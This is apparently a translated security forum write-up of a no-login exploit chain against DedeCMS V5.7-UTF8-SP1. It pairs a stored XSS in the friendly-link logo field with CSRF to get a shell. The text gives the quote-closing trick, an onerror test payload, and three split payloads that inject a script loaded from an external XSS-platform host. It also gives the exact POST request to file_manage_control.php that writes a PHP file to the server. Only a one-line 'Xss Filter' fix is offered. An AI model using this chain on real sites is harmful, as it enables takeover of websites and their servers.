DedeCMS-V5.7-UTF8-SP1 csrf getshell no member center required

DedeCMS-V5.7-UTF8-SP1 csrf getshell no member center required

Recently, csrf went viral again, and various csrf pants were removed. The dede background is easy to write getshell directly.
I 've been trying the black box in the white box and found this problem.
No need to register, 3 Requests getshell
Test version 20140612

A filter bug was found when the black box was used to test the link function.

The Website logo is submitted ">_<' & quot; & lt; & gt; and the double quotation marks are successfully introduced when the logo is displayed in the background to close the src attribute.
 

After multiple tests, we found that double quotation marks can be successfully closed as long as they are enclosed by a single quotation mark (& quot;) and followed by a single quotation mark (& quot ;).

So I submitted the test code.
 

'" onerror=alert(1);//

 

 

Alert is displayed successfully.

First create a project on the xss platform, and then customize the code. Here, we use the pkav post get module.

Post

http://192.168.1.114/dede/file_manage_control.php

Data

fmdo=edit&backurl=&activepath=&filename=csrf.php&str=%3C%3Fphp+phpinfo%28%29%3B%3F%3E&B1=++%E4%BF%9D+%E5%AD%98++

Because the character length is limited here, the payload is split into three segments and submitted separately.
 

'& Quot; onerror = s. src = 'HTTP: // xss platform/KCfTiA ';//

 

'" onerror=body.appendChild(s);//

 

'" onerror=s=createElement('script');//

Note that the Order displayed is the opposite of the order submitted, so we need to reverse the order of payload.



Access the background link module after submission
 

We can see that js is accessed and file_manage_control.php is accessed.

File management, we can see that shell is already in the directory.
 

 

Solution:

Xss Filter